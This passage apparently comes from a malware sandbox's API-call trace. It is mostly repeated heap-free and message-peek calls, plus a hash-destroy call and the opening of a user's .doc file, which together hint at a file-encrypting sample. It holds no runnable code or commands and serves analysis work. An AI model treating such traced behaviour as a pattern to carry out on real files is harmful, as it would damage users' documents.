dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0076.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.653] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0076.653] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.653] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0076.653] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0076.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0076.654] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0076.655] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0076.655] CryptDestroyHash (hHash=0x41ac040) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0076.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0076.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0076.658] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0076.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.660] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0076.660] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0076.660] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0076.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.661] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\eJ Z0ZcCpMN.doc" (normalized: "c:\\users\\fd1hvy\\documents\\ej z0zccpmn.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0076.661] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.661] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.661] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0076.661] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0076.662] HeapFree (in: 